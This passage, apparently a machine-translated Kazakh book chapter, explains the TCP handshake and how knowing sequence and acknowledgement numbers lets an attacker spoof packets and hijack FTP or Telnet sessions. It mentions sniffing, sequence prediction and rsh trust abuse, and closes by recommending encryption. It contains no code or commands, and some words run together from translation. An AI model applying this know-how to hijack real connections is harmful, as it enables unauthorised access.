Практикалық құралдардың жоқтығына қарамастан, біз TCP қосылымдарын тоқтату сияқты қызықты тақырыпты елемей, мұндай шабуылдардың кейбір аспектілеріне тоқтай алмаймыз. TCP пакетінің құрылымы және TCP қосылымдарының қалай орнатылатыны туралы кейбір ақпарат осы кітаптың D қосымшасында берілген, бірақ бұл жерде біз сұраққа тоқталамыз - хакерлерге TCP қосылымын ұстап қалу шабуылдарын жасауға нақты не мүмкіндік береді? Бұл тақырыпты толығырақ қарастырайық, негізінен және ішіндегі талқылауға негізделген.

TCP (Transmission Control Protocol) – виртуалды байланыс арнасы арқылы логикалық қосылымдарды орнатуға мүмкіндік беретін OSI тасымалдау деңгейінің негізгі протоколдарының бірі. Пакеттер осы арна бойынша олардың ретін тіркей отырып жіберіледі және қабылданады, пакеттер ағыны бақыланады, бұрмаланған пакеттерді қайта жіберу ұйымдастырылады, сессия соңында байланыс арнасы бұзылады. TCP протоколы TCP/IP отбасындағы хабар мен қосылымды анықтаудың кеңейтілген жүйесі бар жалғыз негізгі протокол болып табылады.

TCP пакетін анықтау үшін TCP тақырыбында екі 32 разрядты идентификатор бар, олар да реттік нөмір және растау нөмірі деп аталатын пакеттік есептегіш рөлін атқарады. Бізді TCP пакетінің басқару биттері деп аталатын басқа өрісі де қызықтырады. Бұл 6 разрядты өріс келесі басқару биттерін қамтиды (солдан оңға қарай ретімен):

URG - шұғыл жалау;

ACK – растау жалауы;

PSH - тасымалдау жалауы;

RST - қосылымды қалпына келтіру жалаушасы;

SYN - синхрондау жалауы;

FIN – қосылымды тоқтату жалаушасы.

TCP қосылымын құру процедурасын қарастырыңыз.

1. Егер A хосты B хостымен TCP қосылымын орнату қажет болса, онда А хосты В хостына келесі хабарламаны жібереді:

A -> B: SYN, ISSa

Бұл A хосты жіберген хабарламада SYN (реттік нөмірді синхрондау) жалауы орнатылғанын және реттік нөмір өрісі бастапқы 32-биттік ISSA (бастапқы реттік нөмірі) мәніне орнатылғанын білдіреді.

2. А хостынан алынған сұрауға жауап ретінде В хосты SYN бит жиыны және ACK бит жиыны бар хабарламамен жауап береді. Реттік нөмір өрісінде B хосты өзінің бастапқы есептегіш мәнін, ISSb орнатады; растау нөмірі өрісінде A хостынан бірінші пакетте алынған ISSa мәні плюс бір болады. Сондықтан B хосты мына хабарламамен жауап береді:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Соңында А хосты В хостына хабарлама жібереді, онда: ACK биті орнатылған; сериялық нөмір өрісінде ISSa + 1 мәні бар; растау нөмірі өрісінде ISSb + 1 мәні бар. Осыдан кейін A және B хосттары арасындағы TCP байланысы орнатылған болып саналады:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. А хосты енді жаңадан жасалған TCP виртуалды арнасы арқылы B хостына деректер пакеттерін жібере алады:

A -> B: ACK, ISSa+1, ACK(ISSb+1); ДЕРЕКТЕР

Мұнда DATA деректерді білдіреді.

Жоғарыда қарастырылған TCP қосылымын құру алгоритмінен TCP абоненттерінің және TCP қосылымының жалғыз идентификаторлары екі 32-биттік реттік нөмір және растау саны параметрі болып табылатынын көруге болады - ISSa және ISSb . Сондықтан, егер хакер ISSa және ISSb өрістерінің ағымдағы мәндерін анықтай алса, онда оған жалған TCP пакетін жасауға ештеңе кедергі болмайды. Бұл хакерге берілген TCP қосылымы үшін TCP пакетінің ISSA және ISSb параметрлерінің ағымдағы мәндерін алуы, осы TCP қосылымының клиенті атынан кез келген Интернет хостынан пакетті жіберуі жеткілікті екенін білдіреді, және бұл пакет жарамды деп қабылданады!

Мұндай TCP пакеттерінің спуфингінің қауіптілігі де маңызды, өйткені жоғары деңгейлі FTP және TELNET хаттамалары TCP протоколы негізінде жүзеге асырылады, ал FTP клиенттері мен TELNET пакеттерін сәйкестендіру толығымен TCP протоколына негізделген.

Сондай-ақ, FTP және TELNET хаттамалары хабарлама жіберушілердің IP мекенжайларын тексермейтіндіктен, жалған пакетті алған кезде, FTP немесе TELNET серверлері жалған пакетте көрсетілген хакер хостының IP мекенжайына жауап хабарламасын жібереді. Осыдан кейін хакер хосты өзінің IP мекенжайынан FTP немесе TELNET серверімен, бірақ заңды түрде қосылған пайдаланушының құқықтарымен жұмыс істей бастайды, ол өз кезегінде есептегіш сәйкессіздікке байланысты сервермен байланысын жоғалтады.

Осылайша, жоғарыда сипатталған шабуылды жүзеге асыру үшін қажетті және жеткілікті шарт - TCP қосылымын анықтайтын екі ағымдағы 32-биттік ISSa және ISSb параметрлерін білу. Қарастырыңыз мүмкін жолдарыоларды қабылдау. Хакер хосты шабуылдалған желі сегментіне қосылған жағдайда, ISSa және ISSb мәндерін алу міндеті тривиальды болып табылады және желілік трафикті талдау арқылы шешіледі. Сондықтан, TCP протоколы, негізінен, шабуылдаушы арқылы жіберілген хабарламаларды ұстап алу мүмкін болмаған жағдайда ғана қосылымды қорғауға мүмкіндік беретінін анық түсіну керек. бұл байланыс, яғни хакер хосты TCP қосылымының абоненттік сегментінен басқа желі сегментіне қосылған жағдайда ғана.

Сондықтан сегментаралық шабуылдар хакер үшін үлкен қызығушылық тудырады, шабуылдаушы және оның нысанасы әртүрлі желі сегменттерінде болғанда. Бұл жағдайда ISSA және ISSb мәндерін алу міндеті маңызды емес. Бұл мәселені шешу үшін осы уақытқа дейін тек екі әдіс ойлап табылды.

ISSA және ISSb алдыңғы мәндерін экстраполяциялау арқылы TCP қосылым параметрлерінің бастапқы мәнін математикалық болжау.

Unix rsh серверлерінде TCP қосылымының абоненттерін анықтаудағы осалдықтарды пайдалану.

Бірінші тапсырма TCP хаттамасын әр түрлі енгізуді терең зерттеу арқылы шешіледі операциялық жүйелержәне қазір таза теориялық. Екінші мәселе осалдықтарды қолдану арқылы шешіледі Unix жүйелерісенімді хосттарды анықтау арқылы. (Сенімді A хосты – пайдаланушы A хостының r-қызметінің көмегімен аутентификациясыз А хостына қосыла алатын желілік хост B). TCP пакеттерінің параметрлерімен манипуляциялау арқылы хакер сенімді хостқа еліктеуге және шабуыл жасалған хостпен TCP қосылымын үзуге әрекет жасай алады.

Мұның бәрі өте қызықты, бірақ мұндай зерттеулердің практикалық нәтижелері әлі көрінбейді. Сондықтан, біз осы тақырыпқа тереңірек үңілгісі келетіндердің барлығына жоғарыда келтірілген ақпарат қайдан алынған кітапқа жүгінуге кеңес береміз.

Қорытынды

Желіні тыңдау – хакерге желіде айналатын барлық ақпаратты іс жүзінде алуға мүмкіндік беретін желіні бұзудың ең тиімді әдісі. Иіскеу құралдары ең үлкен практикалық дамуға ие болды, яғни. желілерді тыңдау; дегенмен, трафикті хакер хостына қайта бағыттау үшін желінің қалыпты жұмыс істеуіне кедергі жасау арқылы орындалатын желі деректерін ұстап алу әдістерін, атап айтқанда, TCP қосылымдарын ұстау әдістерін елемеуге болмайды. Алайда, іс жүзінде соңғы аталған әдістер әлі жеткілікті түрде дамымаған және жетілдіруді қажет етеді.

Антихакер деректерді ұстап алудың алдын алудың жалғыз жолы оны шифрлау екенін білуі керек, яғни. қорғаудың криптографиялық әдістері. Желі арқылы хабарлама жіберу кезінде желінің кабельдік жүйесі мүлдем осал деп алдын ала болжау керек және желіге қосылған кез келген хакер одан жіберілген барлық құпия хабарламаларды ұстай алады. Бұл мәселені шешудің екі технологиясы бар - VPN желісін құру және хабарламалардың өзін шифрлау. Бұл тапсырмалардың барлығын PGP Desktop Security бағдарламалық пакетін пайдалану арқылы шешу өте оңай (оның сипаттамасын, мысалы, мына жерден табуға болады).

Санат бойынша танымал: